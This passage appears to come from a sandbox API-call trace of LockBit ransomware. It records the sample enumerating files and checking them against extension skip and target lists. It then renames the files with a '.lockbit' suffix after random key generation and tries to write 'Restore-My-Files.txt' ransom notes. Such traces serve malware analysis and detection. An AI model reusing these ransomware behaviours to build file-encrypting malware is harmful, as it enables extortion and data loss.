lstrcmpiW (lpString1=".adv", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".theme", lpString2=".PNG") returned 1 [0161.476] lstrcmpiW (lpString1=".msi", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".msp", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".com", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".diagpkg", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".nls", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".diagcab", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".lock", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".ocx", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".mpa", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".cpl", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".mod", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".hta", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".icns", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".prf", lpString2=".PNG") returned 1 [0161.476] lstrcmpiW (lpString1=".rtp", lpString2=".PNG") returned 1 [0161.476] lstrcmpiW (lpString1=".diagcfg", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".msstyles", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".bin", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".shs", lpString2=".PNG") returned 1 [0161.476] lstrcmpiW (lpString1=".drv", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".wpx", lpString2=".PNG") returned 1 [0161.476] lstrcmpiW (lpString1=".bat", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".rom", lpString2=".PNG") returned 1 [0161.476] lstrcmpiW (lpString1=".msc", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".spl", lpString2=".PNG") returned 1 [0161.477] lstrcmpiW (lpString1=".ps1", lpString2=".PNG") returned 1 [0161.477] lstrcmpiW (lpString1=".msu", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".ics", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".key", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".mp3", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".reg", lpString2=".PNG") returned 1 [0161.477] lstrcmpiW (lpString1=".dll", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".ini", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".idx", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".sys", lpString2=".PNG") returned 1 [0161.477] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".ico", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".lnk", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1=".rdp", lpString2=".PNG") returned 1 [0161.477] lstrcmpiW (lpString1=".lockbit", lpString2=".PNG") returned -1 [0161.477] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0400001.PNG") returned 1 [0161.477] lstrcmpiW (lpString1="ntldr", lpString2="J0400001.PNG") returned 1 [0161.477] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0400001.PNG") returned 1 [0161.477] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0400001.PNG") returned -1 [0161.477] lstrcmpiW (lpString1="autorun.inf", lpString2="J0400001.PNG") returned -1 [0161.477] lstrcmpiW (lpString1="thumbs.db", lpString2="J0400001.PNG") returned 1 [0161.477] lstrcmpiW (lpString1="iconcache.db", lpString2="J0400001.PNG") returned -1 [0161.477] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.477] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG") returned=".PNG" [0161.477] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0161.477] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0161.478] lstrcmpiW (lpString1=".7z", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".ckp", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".dacpac", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".db", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".db-shm", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".db-wal", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".db3", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".dbc", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".dbs", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".dbt", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".dbv", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".frm", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".mdf", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".mrg", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".mwb", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".myd", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".ndf", lpString2=".PNG") returned -1 [0161.478] lstrcmpiW (lpString1=".qry", lpString2=".PNG") returned 1 [0161.478] lstrcmpiW (lpString1=".sdb", lpString2=".PNG") returned 1 [0161.478] lstrcmpiW (lpString1=".sdf", lpString2=".PNG") returned 1 [0161.478] lstrcmpiW (lpString1=".sql", lpString2=".PNG") returned 1 [0161.478] lstrcmpiW (lpString1=".sqlite", lpString2=".PNG") returned 1 [0161.478] lstrcmpiW (lpString1=".sqlite3", lpString2=".PNG") returned 1 [0161.478] lstrcmpiW (lpString1=".sqlitedb", lpString2=".PNG") returned 1 [0161.478] lstrcmpiW (lpString1=".tmd", lpString2=".PNG") returned 1 [0161.478] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG.lockbit") returned 72 [0161.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400001.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.480] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.480] malloc (_Size=0x40068) returned 0x3df0008 [0161.480] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=202883) returned 1 [0161.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.480] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.481] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.487] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.487] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.487] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.493] free (_Block=0x1fa2ed8) [0161.493] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.493] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.493] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea13f600, ftCreationTime.dwHighDateTime=0x1c98cd1, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xea13f600, ftLastWriteTime.dwHighDateTime=0x1c98cd1, nFileSizeHigh=0x0, nFileSizeLow=0x15d49, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0400002.PNG", cAlternateFileName="")) returned 1 [0161.493] lstrcmpiW (lpString1=".", lpString2="J0400002.PNG") returned -1 [0161.493] lstrcmpiW (lpString1="..", lpString2="J0400002.PNG") returned -1 [0161.493] PathFindExtensionW (pszPath="J0400002.PNG") returned=".PNG" [0161.493] lstrcmpiW (lpString1=".386", lpString2=".PNG") returned -1 [0161.493] lstrcmpiW (lpString1=".cmd", lpString2=".PNG") returned -1 [0161.493] lstrcmpiW (lpString1=".exe", lpString2=".PNG") returned -1 [0161.493] lstrcmpiW (lpString1=".ani", lpString2=".PNG") returned -1 [0161.493] lstrcmpiW (lpString1=".adv", lpString2=".PNG") returned -1 [0161.493] lstrcmpiW (lpString1=".theme", lpString2=".PNG") returned 1 [0161.493] lstrcmpiW (lpString1=".msi", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".msp", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".com", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".diagpkg", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".nls", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".diagcab", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".lock", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".ocx", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".mpa", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".cpl", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".mod", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".hta", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".icns", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".prf", lpString2=".PNG") returned 1 [0161.494] lstrcmpiW (lpString1=".rtp", lpString2=".PNG") returned 1 [0161.494] lstrcmpiW (lpString1=".diagcfg", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".msstyles", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".bin", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".shs", lpString2=".PNG") returned 1 [0161.494] lstrcmpiW (lpString1=".drv", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".wpx", lpString2=".PNG") returned 1 [0161.494] lstrcmpiW (lpString1=".bat", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".rom", lpString2=".PNG") returned 1 [0161.494] lstrcmpiW (lpString1=".msc", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".spl", lpString2=".PNG") returned 1 [0161.494] lstrcmpiW (lpString1=".ps1", lpString2=".PNG") returned 1 [0161.494] lstrcmpiW (lpString1=".msu", lpString2=".PNG") returned -1 [0161.494] lstrcmpiW (lpString1=".ics", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".key", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".mp3", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".reg", lpString2=".PNG") returned 1 [0161.495] lstrcmpiW (lpString1=".dll", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".ini", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".idx", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".sys", lpString2=".PNG") returned 1 [0161.495] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".ico", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".lnk", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".rdp", lpString2=".PNG") returned 1 [0161.495] lstrcmpiW (lpString1=".lockbit", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0400002.PNG") returned 1 [0161.495] lstrcmpiW (lpString1="ntldr", lpString2="J0400002.PNG") returned 1 [0161.495] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0400002.PNG") returned 1 [0161.495] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0400002.PNG") returned -1 [0161.495] lstrcmpiW (lpString1="autorun.inf", lpString2="J0400002.PNG") returned -1 [0161.495] lstrcmpiW (lpString1="thumbs.db", lpString2="J0400002.PNG") returned 1 [0161.495] lstrcmpiW (lpString1="iconcache.db", lpString2="J0400002.PNG") returned -1 [0161.495] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.495] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG") returned=".PNG" [0161.495] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0161.495] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0161.495] lstrcmpiW (lpString1=".7z", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".ckp", lpString2=".PNG") returned -1 [0161.495] lstrcmpiW (lpString1=".dacpac", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".db", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".db-shm", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".db-wal", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".db3", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".dbc", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".dbs", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".dbt", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".dbv", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".frm", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".mdf", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".mrg", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".mwb", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".myd", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".ndf", lpString2=".PNG") returned -1 [0161.496] lstrcmpiW (lpString1=".qry", lpString2=".PNG") returned 1 [0161.496] lstrcmpiW (lpString1=".sdb", lpString2=".PNG") returned 1 [0161.496] lstrcmpiW (lpString1=".sdf", lpString2=".PNG") returned 1 [0161.496] lstrcmpiW (lpString1=".sql", lpString2=".PNG") returned 1 [0161.496] lstrcmpiW (lpString1=".sqlite", lpString2=".PNG") returned 1 [0161.496] lstrcmpiW (lpString1=".sqlite3", lpString2=".PNG") returned 1 [0161.496] lstrcmpiW (lpString1=".sqlitedb", lpString2=".PNG") returned 1 [0161.496] lstrcmpiW (lpString1=".tmd", lpString2=".PNG") returned 1 [0161.496] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG.lockbit") returned 72 [0161.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400002.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.498] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.498] malloc (_Size=0x40068) returned 0x3df0008 [0161.498] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=89417) returned 1 [0161.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.499] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.505] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.505] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.505] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.508] free (_Block=0x1fa2ed8) [0161.508] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.508] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.508] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.508] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x234c6600, ftCreationTime.dwHighDateTime=0x1c98cd2, ftLastAccessTime.dwLowDateTime=0x66220ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x234c6600, ftLastWriteTime.dwHighDateTime=0x1c98cd2, nFileSizeHigh=0x0, nFileSizeLow=0x1e836, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0400003.PNG", cAlternateFileName="")) returned 1 [0161.511] lstrcmpiW (lpString1=".", lpString2="J0400003.PNG") returned -1 [0161.511] lstrcmpiW (lpString1="..", lpString2="J0400003.PNG") returned -1 [0161.511] PathFindExtensionW (pszPath="J0400003.PNG") returned=".PNG" [0161.511] lstrcmpiW (lpString1=".386", lpString2=".PNG") returned -1 [0161.511] lstrcmpiW (lpString1=".cmd", lpString2=".PNG") returned -1 [0161.511] lstrcmpiW (lpString1=".exe", lpString2=".PNG") returned -1 [0161.511] lstrcmpiW (lpString1=".ani", lpString2=".PNG") returned -1 [0161.511] lstrcmpiW (lpString1=".adv", lpString2=".PNG") returned -1 [0161.511] lstrcmpiW (lpString1=".theme", lpString2=".PNG") returned 1 [0161.511] lstrcmpiW (lpString1=".msi", lpString2=".PNG") returned -1 [0161.511] lstrcmpiW (lpString1=".msp", lpString2=".PNG") returned -1 [0161.511] lstrcmpiW (lpString1=".com", lpString2=".PNG") returned -1 [0161.511] lstrcmpiW (lpString1=".diagpkg", lpString2=".PNG") returned -1 [0161.511] lstrcmpiW (lpString1=".nls", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".diagcab", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".lock", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".ocx", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".mpa", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".cpl", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".mod", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".hta", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".icns", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".prf", lpString2=".PNG") returned 1 [0161.512] lstrcmpiW (lpString1=".rtp", lpString2=".PNG") returned 1 [0161.512] lstrcmpiW (lpString1=".diagcfg", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".msstyles", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".bin", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".shs", lpString2=".PNG") returned 1 [0161.512] lstrcmpiW (lpString1=".drv", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".wpx", lpString2=".PNG") returned 1 [0161.512] lstrcmpiW (lpString1=".bat", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".rom", lpString2=".PNG") returned 1 [0161.512] lstrcmpiW (lpString1=".msc", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".spl", lpString2=".PNG") returned 1 [0161.512] lstrcmpiW (lpString1=".ps1", lpString2=".PNG") returned 1 [0161.512] lstrcmpiW (lpString1=".msu", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".ics", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".key", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".mp3", lpString2=".PNG") returned -1 [0161.512] lstrcmpiW (lpString1=".reg", lpString2=".PNG") returned 1 [0161.513] lstrcmpiW (lpString1=".dll", lpString2=".PNG") returned -1 [0161.513] lstrcmpiW (lpString1=".ini", lpString2=".PNG") returned -1 [0161.513] lstrcmpiW (lpString1=".idx", lpString2=".PNG") returned -1 [0161.513] lstrcmpiW (lpString1=".sys", lpString2=".PNG") returned 1 [0161.513] lstrcmpiW (lpString1=".hlp", lpString2=".PNG") returned -1 [0161.513] lstrcmpiW (lpString1=".ico", lpString2=".PNG") returned -1 [0161.513] lstrcmpiW (lpString1=".lnk", lpString2=".PNG") returned -1 [0161.513] lstrcmpiW (lpString1=".rdp", lpString2=".PNG") returned 1 [0161.513] lstrcmpiW (lpString1=".lockbit", lpString2=".PNG") returned -1 [0161.513] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0400003.PNG") returned 1 [0161.513] lstrcmpiW (lpString1="ntldr", lpString2="J0400003.PNG") returned 1 [0161.513] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0400003.PNG") returned 1 [0161.513] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0400003.PNG") returned -1 [0161.513] lstrcmpiW (lpString1="autorun.inf", lpString2="J0400003.PNG") returned -1 [0161.513] lstrcmpiW (lpString1="thumbs.db", lpString2="J0400003.PNG") returned 1 [0161.513] lstrcmpiW (lpString1="iconcache.db", lpString2="J0400003.PNG") returned -1 [0161.513] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.513] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG") returned=".PNG" [0161.513] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0161.513] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0161.514] lstrcmpiW (lpString1=".7z", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".ckp", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".dacpac", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".db", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".db-shm", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".db-wal", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".db3", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".dbc", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".dbs", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".dbt", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".dbv", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".frm", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".mdf", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".mrg", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".mwb", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".myd", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".ndf", lpString2=".PNG") returned -1 [0161.514] lstrcmpiW (lpString1=".qry", lpString2=".PNG") returned 1 [0161.514] lstrcmpiW (lpString1=".sdb", lpString2=".PNG") returned 1 [0161.514] lstrcmpiW (lpString1=".sdf", lpString2=".PNG") returned 1 [0161.514] lstrcmpiW (lpString1=".sql", lpString2=".PNG") returned 1 [0161.514] lstrcmpiW (lpString1=".sqlite", lpString2=".PNG") returned 1 [0161.514] lstrcmpiW (lpString1=".sqlite3", lpString2=".PNG") returned 1 [0161.514] lstrcmpiW (lpString1=".sqlitedb", lpString2=".PNG") returned 1 [0161.514] lstrcmpiW (lpString1=".tmd", lpString2=".PNG") returned 1 [0161.515] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG.lockbit") returned 72 [0161.515] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400003.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, 